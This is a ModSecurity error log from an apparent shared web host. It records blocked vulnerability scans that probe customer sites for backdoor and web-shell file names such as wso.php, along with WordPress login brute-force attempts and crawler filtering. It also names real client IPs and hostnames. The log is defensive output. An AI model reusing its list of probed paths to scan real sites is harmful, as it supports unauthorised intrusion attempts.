[Tue May 26 18:39:43.737061 2026] [security2:error] [pid 1015481:tid 1015655] [client 20.196.127.68:8962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/vv.php"] [unique_id "ahWbl7QIKfWDMlp2INdRjwAAATY"]
[Tue May 26 18:39:43.761053 2026] [security2:error] [pid 1015481:tid 1015510] [remote 91.134.89.60:47834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWbl7QIKfWDMlp2INdRigABWxw"]
[Tue May 26 18:39:43.860070 2026] [security2:error] [pid 1015481:tid 1015660] [client 20.151.117.104:10994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-Blogs.php"] [unique_id "ahWbl7QIKfWDMlp2INdRkgAAATs"]
[Tue May 26 18:39:43.898469 2026] [security2:error] [pid 1015481:tid 1015716] [client 130.131.224.225:23255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/reze.php"] [unique_id "ahWbl7QIKfWDMlp2INdRkwAAAXM"]
[Tue May 26 18:39:43.898587 2026] [security2:error] [pid 1015481:tid 1015716] [client 130.131.224.225:23255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/reze.php"] [unique_id "ahWbl7QIKfWDMlp2INdRkwAAAXM"]
[Tue May 26 18:39:44.091995 2026] [security2:error] [pid 1015481:tid 1015624] [client 20.151.117.104:10304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahWbmLQIKfWDMlp2INdRlwAAARc"]
[Tue May 26 18:39:44.120446 2026] [security2:error] [pid 1015481:tid 1015713] [client 85.208.96.198:57214] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRmAAAAXA"]
[Tue May 26 18:39:44.120570 2026] [security2:error] [pid 1015481:tid 1015713] [client 85.208.96.198:57214] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRmAAAAXA"]
[Tue May 26 18:39:44.304877 2026] [security2:error] [pid 1015481:tid 1015619] [client 74.119.118.49:37652] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRnAAAARI"]
[Tue May 26 18:39:44.343550 2026] [security2:error] [pid 1015481:tid 1015613] [client 20.196.127.68:6852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/V5.php"] [unique_id "ahWbmLQIKfWDMlp2INdRngAAAQw"]
[Tue May 26 18:39:44.369510 2026] [security2:error] [pid 1015481:tid 1015670] [client 74.119.118.28:16638] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRoQAAAUU"]
[Tue May 26 18:39:44.369863 2026] [security2:error] [pid 1015481:tid 1015626] [client 74.119.118.51:61743] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRnwAAARk"]
[Tue May 26 18:39:44.390403 2026] [security2:error] [pid 1015481:tid 1015693] [client 74.119.118.199:22779] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRowAAAVw"]
[Tue May 26 18:39:44.409590 2026] [security2:error] [pid 1015481:tid 1015727] [client 20.151.117.104:10988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/themes.php"] [unique_id "ahWbmLQIKfWDMlp2INdRpQAAAX4"]
[Tue May 26 18:39:44.501403 2026] [security2:error] [pid 1015481:tid 1015717] [client 185.191.171.3:28946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/lg-air-conditioners.html"] [unique_id "ahWbmLQIKfWDMlp2INdRqAAAAXQ"]
[Tue May 26 18:39:44.501487 2026] [security2:error] [pid 1015481:tid 1015717] [client 185.191.171.3:28946] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acdealernoida.in"] [uri "/lg-air-conditioners.html"] [unique_id "ahWbmLQIKfWDMlp2INdRqAAAAXQ"]
[Tue May 26 18:39:44.503562 2026] [security2:error] [pid 1015481:tid 1015736] [client 74.119.118.14:55880] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRpgAAAYc"]
[Tue May 26 18:39:44.563460 2026] [security2:error] [pid 1015481:tid 1015652] [client 74.119.118.28:38516] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWbmLQIKfWDMlp2INdRqQAAATM"]
[Tue May 26 18:39:44.651986 2026] [security2:error] [pid 1015481:tid 1015616] [client 74.119.118.24:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWbmLQIKfWDMlp2INdRrgAAAQ8"]
[Tue May 26 18:39:44.652614 2026] [security2:error] [pid 1015481:tid 1015676] [client 74.119.118.24:46204] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWbmLQIKfWDMlp2INdRrAAAAUs"]
[Tue May 26 18:39:44.658933 2026] [security2:error] [pid 1015481:tid 1015629] [client 20.151.117.104:14020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/cv.php"] [unique_id "ahWbmLQIKfWDMlp2INdRrwAAARw"]
[Tue May 26 18:39:44.821416 2026] [security2:error] [pid 1015481:tid 1015678] [client 74.119.118.25:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWbmLQIKfWDMlp2INdRtwAAAU0"]
[Tue May 26 18:39:44.822007 2026] [security2:error] [pid 1015481:tid 1015661] [client 74.119.118.25:55281] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWbmLQIKfWDMlp2INdRqwAAATw"]
[Tue May 26 18:39:44.919058 2026] [security2:error] [pid 1015481:tid 1015633] [client 74.119.118.28:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWbmLQIKfWDMlp2INdRvQAAASA"]
[Tue May 26 18:39:44.939716 2026] [security2:error] [pid 1015481:tid 1015631] [client 74.119.118.28:19304] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWbmLQIKfWDMlp2INdRuwAAAR4"]
[Tue May 26 18:39:44.958772 2026] [security2:error] [pid 1015481:tid 1015721] [client 20.196.127.68:14302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-user.php"] [unique_id "ahWbmLQIKfWDMlp2INdRvgAAAXg"]
[Tue May 26 18:39:45.051056 2026] [security2:error] [pid 1015481:tid 1015695] [client 20.151.117.104:14083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahWbmbQIKfWDMlp2INdRwAAAAV4"]
[Tue May 26 18:39:45.171446 2026] [security2:error] [pid 1015481:tid 1015682] [client 130.131.224.225:38739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wefile.php"] [unique_id "ahWbmbQIKfWDMlp2INdRwQAAAVE"]
[Tue May 26 18:39:45.171594 2026] [security2:error] [pid 1015481:tid 1015682] [client 130.131.224.225:38739] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wefile.php"] [unique_id "ahWbmbQIKfWDMlp2INdRwQAAAVE"]
[Tue May 26 18:39:45.263555 2026] [security2:error] [pid 1015481:tid 1015704] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbmLQIKfWDMlp2INdRugAAAWc"]
[Tue May 26 18:39:45.283780 2026] [security2:error] [pid 1015481:tid 1015733] [client 74.119.118.15:5449] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWbmbQIKfWDMlp2INdRxQAAAYQ"]
[Tue May 26 18:39:45.358994 2026] [security2:error] [pid 1015481:tid 1015723] [client 20.151.117.104:14123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ws83.php"] [unique_id "ahWbmbQIKfWDMlp2INdRxwAAAXo"]
[Tue May 26 18:39:45.612757 2026] [security2:error] [pid 1015481:tid 1015655] [client 20.151.117.104:14122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/atex1.php"] [unique_id "ahWbmbQIKfWDMlp2INdRyAAAATY"]
[Tue May 26 18:39:45.946422 2026] [security2:error] [pid 1015481:tid 1015634] [client 20.151.117.104:14084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/class-t.api.php"] [unique_id "ahWbmbQIKfWDMlp2INdR0AAAASE"]
[Tue May 26 18:39:45.958716 2026] [security2:error] [pid 1015481:tid 1015713] [client 130.131.224.225:64431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xda.php"] [unique_id "ahWbmbQIKfWDMlp2INdR0QAAAXA"]
[Tue May 26 18:39:45.958848 2026] [security2:error] [pid 1015481:tid 1015713] [client 130.131.224.225:64431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/xda.php"] [unique_id "ahWbmbQIKfWDMlp2INdR0QAAAXA"]
[Tue May 26 18:39:46.128107 2026] [security2:error] [pid 1015481:tid 1015593] [remote 103.255.134.61:41524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.134.255.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWbmrQIKfWDMlp2INdR0gABfG8"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:39:46.181505 2026] [security2:error] [pid 1015481:tid 1015613] [client 20.151.117.104:14023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/w.php"] [unique_id "ahWbmrQIKfWDMlp2INdR1gAAAQw"]
[Tue May 26 18:39:46.410202 2026] [security2:error] [pid 1015481:tid 1015686] [client 20.196.127.68:6734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-blog.php"] [unique_id "ahWbmrQIKfWDMlp2INdR2gAAAVU"]
[Tue May 26 18:39:46.433800 2026] [security2:error] [pid 1015481:tid 1015697] [client 20.151.117.104:14018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/archive.php"] [unique_id "ahWbmrQIKfWDMlp2INdR2wAAAWA"]
[Tue May 26 18:39:46.669688 2026] [security2:error] [pid 1015481:tid 1015720] [client 20.151.117.104:14017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/bless.php"] [unique_id "ahWbmrQIKfWDMlp2INdR3wAAAXc"]
[Tue May 26 18:39:46.871191 2026] [security2:error] [pid 1015481:tid 1015647] [client 130.131.224.225:64926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/revealability.php"] [unique_id "ahWbmrQIKfWDMlp2INdR5wAAAS4"]
[Tue May 26 18:39:46.871315 2026] [security2:error] [pid 1015481:tid 1015647] [client 130.131.224.225:64926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/revealability.php"] [unique_id "ahWbmrQIKfWDMlp2INdR5wAAAS4"]
[Tue May 26 18:39:46.887828 2026] [security2:error] [pid 1015481:tid 1015603] [remote 79.143.178.15:40782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbmrQIKfWDMlp2INdR4AABH3k"]
[Tue May 26 18:39:47.016746 2026] [security2:error] [pid 1015481:tid 1015672] [client 20.151.117.104:14132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/sagax1.php"] [unique_id "ahWbm7QIKfWDMlp2INdR6AAAAUc"]
[Tue May 26 18:39:47.033872 2026] [security2:error] [pid 1015481:tid 1015718] [client 20.196.127.68:10744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp.php"] [unique_id "ahWbm7QIKfWDMlp2INdR6QAAAXU"]
[Tue May 26 18:39:47.377977 2026] [security2:error] [pid 1015481:tid 1015633] [client 20.151.117.104:10961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wpc.php"] [unique_id "ahWbm7QIKfWDMlp2INdR8QAAASA"]
[Tue May 26 18:39:47.616178 2026] [security2:error] [pid 1015481:tid 1015719] [client 20.196.127.68:7136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/worksec.php"] [unique_id "ahWbm7QIKfWDMlp2INdR9QAAAXY"]
[Tue May 26 18:39:47.692390 2026] [security2:error] [pid 1015481:tid 1015646] [client 20.151.117.104:14546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/fone1.php"] [unique_id "ahWbm7QIKfWDMlp2INdR-QAAAS0"]
[Tue May 26 18:39:48.015188 2026] [security2:error] [pid 1015481:tid 1015674] [client 20.151.117.104:14563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ncx.php"] [unique_id "ahWbnLQIKfWDMlp2INdSAAAAAUk"]
[Tue May 26 18:39:48.198114 2026] [security2:error] [pid 1015481:tid 1015621] [client 20.196.127.68:3909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-themes.php"] [unique_id "ahWbnLQIKfWDMlp2INdSBAAAARQ"]
[Tue May 26 18:39:48.256633 2026] [security2:error] [pid 1015481:tid 1015655] [client 20.151.117.104:14612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahWbnLQIKfWDMlp2INdSCAAAATY"]
[Tue May 26 18:39:48.284264 2026] [security2:error] [pid 1015481:tid 1015630] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbm7QIKfWDMlp2INdR_wAAAR0"]
[Tue May 26 18:39:48.368720 2026] [security2:error] [pid 1015481:tid 1015505] [remote 79.143.178.15:40782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbnLQIKfWDMlp2INdSCQABZhc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:39:48.546899 2026] [security2:error] [pid 1015481:tid 1015673] [client 20.151.117.104:10945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wso.php"] [unique_id "ahWbnLQIKfWDMlp2INdSDQAAAUg"]
[Tue May 26 18:39:48.786269 2026] [security2:error] [pid 1015481:tid 1015725] [client 20.196.127.68:12665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-signin.php"] [unique_id "ahWbnLQIKfWDMlp2INdSDwAAAXw"]
[Tue May 26 18:39:48.803575 2026] [security2:error] [pid 1015481:tid 1015623] [client 20.151.117.104:14607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/zup.php73"] [unique_id "ahWbnLQIKfWDMlp2INdSEAAAARY"]
[Tue May 26 18:39:49.056029 2026] [security2:error] [pid 1015481:tid 1015500] [remote 46.62.185.67:59712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbnLQIKfWDMlp2INdSEQABDBI"]
[Tue May 26 18:39:49.425088 2026] [security2:error] [pid 1015481:tid 1015616] [client 20.196.127.68:4401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-blog-header.php"] [unique_id "ahWbnbQIKfWDMlp2INdSIQAAAQ8"]
[Tue May 26 18:39:49.772617 2026] [security2:error] [pid 1015481:tid 1015636] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbnbQIKfWDMlp2INdSJgAAASM"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1285834&moderation-hash=8f2b10575238d96ad682605ac8878fdf
